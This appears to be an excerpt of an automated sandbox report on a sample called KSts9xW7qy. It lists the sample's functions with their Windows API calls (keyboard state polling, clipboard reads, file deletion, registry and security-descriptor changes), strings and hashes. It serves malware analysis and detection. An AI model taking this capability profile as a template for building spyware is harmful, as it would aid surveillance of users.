                                                                        • Source File: 00000000.00000002.1673381954.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                                                                        • Associated: 00000000.00000002.1673361876.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673440583.0000000000EFD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673440583.0000000000F1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673474923.0000000000F2A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673488794.0000000000F34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_e70000_KSts9xW7qy.jbxd
                                                                        Similarity
                                                                        • API ID: Clipboard$Global$Close$AvailableDataFormatLockUnlock$Open
                                                                        • String ID:
                                                                        • API String ID: 3222323430-0
                                                                        • Opcode ID: e431abc3de1d7d9de2eca114a38f1b868af8cbcadbe947f7b3a50c6c269b0b81
                                                                        • Instruction ID: 04278e1a08e4fdfd173357261c9e2b8716c404da7c48cc464f58f36100e98c70
                                                                        • Opcode Fuzzy Hash: e431abc3de1d7d9de2eca114a38f1b868af8cbcadbe947f7b3a50c6c269b0b81
                                                                        • Instruction Fuzzy Hash: CA518D31208201AFD310AF65DE46F7F7BE9AF84B15F00542DF59AF61A1DB61D80ACA62
                                                                        Function 00EBF5FA Relevance: 28.3, APIs: 13, Strings: 3, Instructions: 278timefileCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • FindFirstFileW.KERNEL32(?,?), ref: 00EBF62B
                                                                        • FindClose.KERNEL32(00000000), ref: 00EBF67F
                                                                        • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00EBF6A4
                                                                        • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00EBF6BB
                                                                        • FileTimeToSystemTime.KERNEL32(?,?), ref: 00EBF6E2
                                                                        • __swprintf.LIBCMT ref: 00EBF72E
                                                                        • __swprintf.LIBCMT ref: 00EBF767
                                                                        • __swprintf.LIBCMT ref: 00EBF7BB
                                                                          • Part of subcall function 00E9172B: __woutput_l.LIBCMT ref: 00E91784
                                                                        • __swprintf.LIBCMT ref: 00EBF809
                                                                        • __swprintf.LIBCMT ref: 00EBF858
                                                                        • __swprintf.LIBCMT ref: 00EBF8A7
                                                                        • __swprintf.LIBCMT ref: 00EBF8F6
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1673381954.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                                                                        • Associated: 00000000.00000002.1673361876.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673440583.0000000000EFD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673440583.0000000000F1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673474923.0000000000F2A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673488794.0000000000F34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_e70000_KSts9xW7qy.jbxd
                                                                        Similarity
                                                                        • API ID: __swprintf$FileTime$FindLocal$CloseFirstSystem__woutput_l
                                                                        • String ID: %02d$%4d$%4d%02d%02d%02d%02d%02d
                                                                        • API String ID: 835046349-2428617273
                                                                        • Opcode ID: 133cc0b800bd05c22cea6e496e1f6248a1f4eb1557882af2554580f82e318d22
                                                                        • Instruction ID: 2dd756180545169a97f9fc4f8b9c3c2e19e78ee6cc5a518569cab1108ce48170
                                                                        • Opcode Fuzzy Hash: 133cc0b800bd05c22cea6e496e1f6248a1f4eb1557882af2554580f82e318d22
                                                                        • Instruction Fuzzy Hash: 9CA10DB2408344ABC311EBA5CC85DAFB7ECEF99704F405C2EF59992152EB34D949CB62
                                                                        Function 00EC1B2F Relevance: 28.1, APIs: 15, Strings: 1, Instructions: 118fileCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • FindFirstFileW.KERNEL32(?,?,74DE8FB0,?,00000000), ref: 00EC1B50
                                                                        • _wcscmp.LIBCMT ref: 00EC1B65
                                                                        • _wcscmp.LIBCMT ref: 00EC1B7C
                                                                        • GetFileAttributesW.KERNEL32(?), ref: 00EC1B8E
                                                                        • SetFileAttributesW.KERNEL32(?,?), ref: 00EC1BA8
                                                                        • FindNextFileW.KERNEL32(00000000,?), ref: 00EC1BC0
                                                                        • FindClose.KERNEL32(00000000), ref: 00EC1BCB
                                                                        • FindFirstFileW.KERNEL32(*.*,?), ref: 00EC1BE7
                                                                        • _wcscmp.LIBCMT ref: 00EC1C0E
                                                                        • _wcscmp.LIBCMT ref: 00EC1C25
                                                                        • SetCurrentDirectoryW.KERNEL32(?), ref: 00EC1C37
                                                                        • SetCurrentDirectoryW.KERNEL32(00F239FC), ref: 00EC1C55
                                                                        • FindNextFileW.KERNEL32(00000000,00000010), ref: 00EC1C5F
                                                                        • FindClose.KERNEL32(00000000), ref: 00EC1C6C
                                                                        • FindClose.KERNEL32(00000000), ref: 00EC1C7C
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1673381954.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                                                                        • Associated: 00000000.00000002.1673361876.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673440583.0000000000EFD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673440583.0000000000F1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673474923.0000000000F2A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673488794.0000000000F34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_e70000_KSts9xW7qy.jbxd
                                                                        Similarity
                                                                        • API ID: Find$File$_wcscmp$Close$AttributesCurrentDirectoryFirstNext
                                                                        • String ID: *.*
                                                                        • API String ID: 1803514871-438819550
                                                                        • Opcode ID: e9d96f5968335a5718015996ea55ce8467591e88ad8e81095af4541c82b1ec88
                                                                        • Instruction ID: fed4b563a82d8a5dfedce6b755168d4decd86887ff53b60ccd70294d521eda4a
                                                                        • Opcode Fuzzy Hash: e9d96f5968335a5718015996ea55ce8467591e88ad8e81095af4541c82b1ec88
                                                                        • Instruction Fuzzy Hash: FF31E332605219AEDF14EBA0DD48FEE77AD9F46324F0001D9F801F2091EB75DE86DA60
                                                                        Function 00EC1C8A Relevance: 24.6, APIs: 13, Strings: 1, Instructions: 111fileCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • FindFirstFileW.KERNEL32(?,?,74DE8FB0,?,00000000), ref: 00EC1CAB
                                                                        • _wcscmp.LIBCMT ref: 00EC1CC0
                                                                        • _wcscmp.LIBCMT ref: 00EC1CD7
                                                                          • Part of subcall function 00EB6BD4: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 00EB6BEF
                                                                        • FindNextFileW.KERNEL32(00000000,?), ref: 00EC1D06
                                                                        • FindClose.KERNEL32(00000000), ref: 00EC1D11
                                                                        • FindFirstFileW.KERNEL32(*.*,?), ref: 00EC1D2D
                                                                        • _wcscmp.LIBCMT ref: 00EC1D54
                                                                        • _wcscmp.LIBCMT ref: 00EC1D6B
                                                                        • SetCurrentDirectoryW.KERNEL32(?), ref: 00EC1D7D
                                                                        • SetCurrentDirectoryW.KERNEL32(00F239FC), ref: 00EC1D9B
                                                                        • FindNextFileW.KERNEL32(00000000,00000010), ref: 00EC1DA5
                                                                        • FindClose.KERNEL32(00000000), ref: 00EC1DB2
                                                                        • FindClose.KERNEL32(00000000), ref: 00EC1DC2
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1673381954.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                                                                        • Associated: 00000000.00000002.1673361876.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673440583.0000000000EFD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673440583.0000000000F1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673474923.0000000000F2A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673488794.0000000000F34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_e70000_KSts9xW7qy.jbxd
                                                                        Similarity
                                                                        • API ID: Find$File$_wcscmp$Close$CurrentDirectoryFirstNext$Create
                                                                        • String ID: *.*
                                                                        • API String ID: 1824444939-438819550
                                                                        • Opcode ID: 20010c7d221f609e5804cff98c64c070dbec4071c06a9b0dbe227fd8622d6220
                                                                        • Instruction ID: 524297bc2432deb352590164ef30a37d9a0b504a9f676f58ac02a8157bf8b63f
                                                                        • Opcode Fuzzy Hash: 20010c7d221f609e5804cff98c64c070dbec4071c06a9b0dbe227fd8622d6220
                                                                        • Instruction Fuzzy Hash: 18312A3150521A7ECF10AFA0DD08FEE7BAD9F46325F1015D5F801B3092DB35CA46DA50
                                                                        Function 00E77D19 Relevance: 23.7, APIs: 2, Strings: 11, Instructions: 962COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1673381954.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                                                                        • Associated: 00000000.00000002.1673361876.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673440583.0000000000EFD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673440583.0000000000F1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673474923.0000000000F2A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673488794.0000000000F34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_e70000_KSts9xW7qy.jbxd
                                                                        Similarity
                                                                        • API ID: _memset
                                                                        • String ID: Q\E$[$[:<:]]$[:>:]]$\$\$\$\b(?<=\w)$\b(?=\w)$]$^
                                                                        • API String ID: 2102423945-2023335898
                                                                        • Opcode ID: e5b0617defe90a630823ea69f9d983abff32a5001098b66a7206219403b8b6b1
                                                                        • Instruction ID: 9184ea9a9680118c87c60400a8563949a89d713e4335bd519464dd9761106654
                                                                        • Opcode Fuzzy Hash: e5b0617defe90a630823ea69f9d983abff32a5001098b66a7206219403b8b6b1
                                                                        • Instruction Fuzzy Hash: 7C82A071D04259CBCB24CF98C8806EDBBB1FF44318F25A16AD859BB351E774AD81DB90
                                                                        Function 00EC091D Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 185timeCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • GetLocalTime.KERNEL32(?), ref: 00EC09DF
                                                                        • SystemTimeToFileTime.KERNEL32(?,?), ref: 00EC09EF
                                                                        • LocalFileTimeToFileTime.KERNEL32(?,?), ref: 00EC09FB
                                                                        • __wsplitpath.LIBCMT ref: 00EC0A59
                                                                        • _wcscat.LIBCMT ref: 00EC0A71
                                                                        • _wcscat.LIBCMT ref: 00EC0A83
                                                                        • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00EC0A98
                                                                        • SetCurrentDirectoryW.KERNEL32(?), ref: 00EC0AAC
                                                                        • SetCurrentDirectoryW.KERNEL32(?), ref: 00EC0ADE
                                                                        • SetCurrentDirectoryW.KERNEL32(?), ref: 00EC0AFF
                                                                        • _wcscpy.LIBCMT ref: 00EC0B0B
                                                                        • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?), ref: 00EC0B4A
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1673381954.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                                                                        • Associated: 00000000.00000002.1673361876.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673440583.0000000000EFD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673440583.0000000000F1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673474923.0000000000F2A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673488794.0000000000F34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_e70000_KSts9xW7qy.jbxd
                                                                        Similarity
                                                                        • API ID: CurrentDirectoryTime$File$Local_wcscat$System__wsplitpath_wcscpy
                                                                        • String ID: *.*
                                                                        • API String ID: 3566783562-438819550
                                                                        • Opcode ID: df1ec7c5f84bcadfc9eba53cacd8827e7b3ae1af076d76ec0f6de033ef40826b
                                                                        • Instruction ID: b626eaa1565b21c2efbf286140548e235786c27235c250adaa135cb52475fe5e
                                                                        • Opcode Fuzzy Hash: df1ec7c5f84bcadfc9eba53cacd8827e7b3ae1af076d76ec0f6de033ef40826b
                                                                        • Instruction Fuzzy Hash: FC6148725083059FD710EF60C944EAEB3E8FF89314F04991DF989A7252DB32E946CB92
                                                                        Function 00EAA66C Relevance: 21.2, APIs: 14, Instructions: 178memoryCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                          • Part of subcall function 00EAABBB: GetUserObjectSecurity.USER32(?,?,?,00000000,?), ref: 00EAABD7
                                                                          • Part of subcall function 00EAABBB: GetLastError.KERNEL32(?,00EAA69F,?,?,?), ref: 00EAABE1
                                                                          • Part of subcall function 00EAABBB: GetProcessHeap.KERNEL32(00000008,?,?,00EAA69F,?,?,?), ref: 00EAABF0
                                                                          • Part of subcall function 00EAABBB: HeapAlloc.KERNEL32(00000000,?,00EAA69F,?,?,?), ref: 00EAABF7
                                                                          • Part of subcall function 00EAABBB: GetUserObjectSecurity.USER32(?,?,00000000,?,?), ref: 00EAAC0E
                                                                          • Part of subcall function 00EAAC56: GetProcessHeap.KERNEL32(00000008,00EAA6B5,00000000,00000000,?,00EAA6B5,?), ref: 00EAAC62
                                                                          • Part of subcall function 00EAAC56: HeapAlloc.KERNEL32(00000000,?,00EAA6B5,?), ref: 00EAAC69
                                                                          • Part of subcall function 00EAAC56: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00EAA6B5,?), ref: 00EAAC7A
                                                                        • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00EAA6D0
                                                                        • _memset.LIBCMT ref: 00EAA6E5
                                                                        • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 00EAA704
                                                                        • GetLengthSid.ADVAPI32(?), ref: 00EAA715
                                                                        • GetAce.ADVAPI32(?,00000000,?), ref: 00EAA752
                                                                        • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00EAA76E
                                                                        • GetLengthSid.ADVAPI32(?), ref: 00EAA78B
                                                                        • GetProcessHeap.KERNEL32(00000008,-00000008), ref: 00EAA79A
                                                                        • HeapAlloc.KERNEL32(00000000), ref: 00EAA7A1
                                                                        • GetLengthSid.ADVAPI32(?,00000008,?), ref: 00EAA7C2
                                                                        • CopySid.ADVAPI32(00000000), ref: 00EAA7C9
                                                                        • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 00EAA7FA
                                                                        • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 00EAA820
                                                                        • SetUserObjectSecurity.USER32(?,00000004,?), ref: 00EAA834
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1673381954.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                                                                        • Associated: 00000000.00000002.1673361876.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673440583.0000000000EFD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673440583.0000000000F1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673474923.0000000000F2A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673488794.0000000000F34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_e70000_KSts9xW7qy.jbxd
                                                                        Similarity
                                                                        • API ID: HeapSecurity$AllocDescriptorLengthObjectProcessUser$Dacl$CopyErrorInformationInitializeLast_memset
                                                                        • String ID:
                                                                        • API String ID: 3996160137-0
                                                                        • Opcode ID: 6a3281c0dfd423da131fe518338fa1005bb921cc59da4e3e0e1c0b34979524f7
                                                                        • Instruction ID: a25a9d95a7c54eb6fea74b174cf49dcabb13d82e2cb8155906eec58824715439
                                                                        • Opcode Fuzzy Hash: 6a3281c0dfd423da131fe518338fa1005bb921cc59da4e3e0e1c0b34979524f7
                                                                        • Instruction Fuzzy Hash: 0B513E71900209AFDF149F95DC44AEEBBBAFF49304F089129F915BA291DB34AA05CB61
                                                                        Function 00E76F07 Relevance: 18.4, Strings: 14, Instructions: 883COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1673381954.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                                                                        • Associated: 00000000.00000002.1673361876.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673440583.0000000000EFD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673440583.0000000000F1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673474923.0000000000F2A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673488794.0000000000F34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_e70000_KSts9xW7qy.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: ANY)$ANYCRLF)$BSR_ANYCRLF)$BSR_UNICODE)$CR)$CRLF)$LF)$LIMIT_MATCH=$LIMIT_RECURSION=$NO_AUTO_POSSESS)$NO_START_OPT)$UCP)$UTF)$UTF16)
                                                                        • API String ID: 0-4052911093
                                                                        • Opcode ID: d112369b45fa5d0896847ebeefe3230ffdb2de93385698a1443ce88103429854
                                                                        • Instruction ID: 31bba4b206a349705a19dd62bdcfc11c490388a1684e3a7bae6219498fc155cc
                                                                        • Opcode Fuzzy Hash: d112369b45fa5d0896847ebeefe3230ffdb2de93385698a1443ce88103429854
                                                                        • Instruction Fuzzy Hash: E8728071E042199BDB24CF58D8407FEB7B5BF04314F24916AEA59FB281EB709E81DB90
                                                                        Function 00EB63F9 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 89fileCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                          • Part of subcall function 00EB6EBB: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00EB5FA6,?), ref: 00EB6ED8
                                                                          • Part of subcall function 00EB72CB: GetFileAttributesW.KERNEL32(?,00EB6019), ref: 00EB72CC
                                                                        • _wcscat.LIBCMT ref: 00EB6441
                                                                        • __wsplitpath.LIBCMT ref: 00EB645F
                                                                        • FindFirstFileW.KERNEL32(?,?), ref: 00EB6474
                                                                        • _wcscpy.LIBCMT ref: 00EB64A3
                                                                        • _wcscat.LIBCMT ref: 00EB64B8
                                                                        • _wcscat.LIBCMT ref: 00EB64CA
                                                                        • DeleteFileW.KERNEL32(?), ref: 00EB64DA
                                                                        • FindNextFileW.KERNEL32(00000000,00000010), ref: 00EB64EB
                                                                        • FindClose.KERNEL32(00000000), ref: 00EB6506
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1673381954.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                                                                        • Associated: 00000000.00000002.1673361876.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673440583.0000000000EFD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673440583.0000000000F1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673474923.0000000000F2A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673488794.0000000000F34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_e70000_KSts9xW7qy.jbxd
                                                                        Similarity
                                                                        • API ID: File$Find_wcscat$AttributesCloseDeleteFirstFullNameNextPath__wsplitpath_wcscpy
                                                                        • String ID: \*.*
                                                                        • API String ID: 2643075503-1173974218
                                                                        • Opcode ID: aca97e20dfffa1ff810bc403f832f40569d2ce3c5a0bf3a9aa8626f8baf4d878
                                                                        • Instruction ID: b8e28033fd9c6c848fb3f61941f3dff09d69abebb854ed53a922fa006d5501b0
                                                                        • Opcode Fuzzy Hash: aca97e20dfffa1ff810bc403f832f40569d2ce3c5a0bf3a9aa8626f8baf4d878
                                                                        • Instruction Fuzzy Hash: 0231D4B240C388AEC721DBA48C84ADBB7DCAF95304F40192AF6D8D3141EA35D54DC7A3
                                                                        Function 00ED31BC Relevance: 16.9, APIs: 11, Instructions: 397registryCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                          • Part of subcall function 00ED3C06: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00ED2BB5,?,?), ref: 00ED3C1D
                                                                        • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00ED328E
                                                                          • Part of subcall function 00E7936C: __swprintf.LIBCMT ref: 00E793AB
                                                                          • Part of subcall function 00E7936C: __itow.LIBCMT ref: 00E793DF
                                                                        • RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?), ref: 00ED332D
                                                                        • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000008), ref: 00ED33C5
                                                                        • RegCloseKey.ADVAPI32(000000FE,000000FE,00000000,?,00000000), ref: 00ED3604
                                                                        • RegCloseKey.ADVAPI32(00000000), ref: 00ED3611
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1673381954.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                                                                        • Associated: 00000000.00000002.1673361876.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673440583.0000000000EFD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673440583.0000000000F1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673474923.0000000000F2A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673488794.0000000000F34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_e70000_KSts9xW7qy.jbxd
                                                                        Similarity
                                                                        • API ID: CloseQueryValue$BuffCharConnectRegistryUpper__itow__swprintf
                                                                        • String ID:
                                                                        • API String ID: 1240663315-0
                                                                        • Opcode ID: 309f410242f611b7617f722e536c8057699fddbc85d766f010ce22e2cd1953e2
                                                                        • Instruction ID: 726425f5000490a5a2a4898a6c314debec1f33b6566c5623a4dd1d3705863b65
                                                                        • Opcode Fuzzy Hash: 309f410242f611b7617f722e536c8057699fddbc85d766f010ce22e2cd1953e2
                                                                        • Instruction Fuzzy Hash: 1DE16F35604200AFCB14DF29C991D6ABBE9EF89314F04955EF45AE7361DB30ED06CB52
                                                                        Function 00EB2B37 Relevance: 16.6, APIs: 11, Instructions: 119keyboardCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • GetKeyboardState.USER32(?), ref: 00EB2B5F
                                                                        • GetAsyncKeyState.USER32(000000A0), ref: 00EB2BE0
                                                                        • GetKeyState.USER32(000000A0), ref: 00EB2BFB
                                                                        • GetAsyncKeyState.USER32(000000A1), ref: 00EB2C15
                                                                        • GetKeyState.USER32(000000A1), ref: 00EB2C2A
                                                                        • GetAsyncKeyState.USER32(00000011), ref: 00EB2C42
                                                                        • GetKeyState.USER32(00000011), ref: 00EB2C54
                                                                        • GetAsyncKeyState.USER32(00000012), ref: 00EB2C6C
                                                                        • GetKeyState.USER32(00000012), ref: 00EB2C7E
                                                                        • GetAsyncKeyState.USER32(0000005B), ref: 00EB2C96
                                                                        • GetKeyState.USER32(0000005B), ref: 00EB2CA8
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1673381954.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                                                                        • Associated: 00000000.00000002.1673361876.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673440583.0000000000EFD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673440583.0000000000F1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673474923.0000000000F2A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673488794.0000000000F34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_e70000_KSts9xW7qy.jbxd
                                                                        Similarity
                                                                        • API ID: State$Async$Keyboard
                                                                        • String ID:
                                                                        • API String ID: 541375521-0
                                                                        • Opcode ID: 8249e20527250677a7a70708e54a56f8b85ec452b3563827acfa1f35a51b3c09
                                                                        • Instruction ID: fe8f46de0372ce117c4c8da237db7f86d81abef6fed27816b58c36ffd87a63a1
                                                                        • Opcode Fuzzy Hash: 8249e20527250677a7a70708e54a56f8b85ec452b3563827acfa1f35a51b3c09
                                                                        • Instruction Fuzzy Hash: 3E41A1305087C96DFB319B6089483FBFEA16F11348F04905DD7C67A2C1DAA599C8CBA2
                                                                        Function 00EC6D07 Relevance: 15.1, APIs: 10, Instructions: 83clipboardmemoryCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1673381954.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                                                                        • Associated: 00000000.00000002.1673361876.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673440583.0000000000EFD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673440583.0000000000F1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673474923.0000000000F2A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673488794.0000000000F34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_e70000_KSts9xW7qy.jbxd
                                                                        Similarity
                                                                        • API ID: Clipboard$AllocCloseEmptyGlobalOpen
                                                                        • String ID:
                                                                        • API String ID: 1737998785-0
                                                                        • Opcode ID: 56c6c72a5c7aaadbc5d1f9f3dfd21ef370e10cbc48979bad3b0d3cd71e53326b
                                                                        • Instruction ID: f8d6fab799cbb54d74d5e8d8d236e516e1c81a6afb7d7b9f928d794addc05c48
                                                                        • Opcode Fuzzy Hash: 56c6c72a5c7aaadbc5d1f9f3dfd21ef370e10cbc48979bad3b0d3cd71e53326b
                                                                        • Instruction Fuzzy Hash: 5D216B31304110AFDB11AF65DD49B7E7BE9EF84721F019019F90AEB261CB31E801CB90
                                                                        Function 00ECC18C Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 232COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                          • Part of subcall function 00EA9ABF: CLSIDFromProgID.OLE32 ref: 00EA9ADC
                                                                          • Part of subcall function 00EA9ABF: ProgIDFromCLSID.OLE32(?,00000000), ref: 00EA9AF7
                                                                          • Part of subcall function 00EA9ABF: lstrcmpiW.KERNEL32(?,00000000), ref: 00EA9B05
                                                                          • Part of subcall function 00EA9ABF: CoTaskMemFree.OLE32(00000000,?,00000000), ref: 00EA9B15
                                                                        • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000,?,?,?), ref: 00ECC235
                                                                        • _memset.LIBCMT ref: 00ECC242
                                                                        • _memset.LIBCMT ref: 00ECC360
                                                                        • CoCreateInstanceEx.OLE32(?,00000000,00000015,?,00000001,00000001), ref: 00ECC38C
                                                                        • CoTaskMemFree.OLE32(?), ref: 00ECC397
                                                                        Strings
                                                                        • NULL Pointer assignment, xrefs: 00ECC3E5
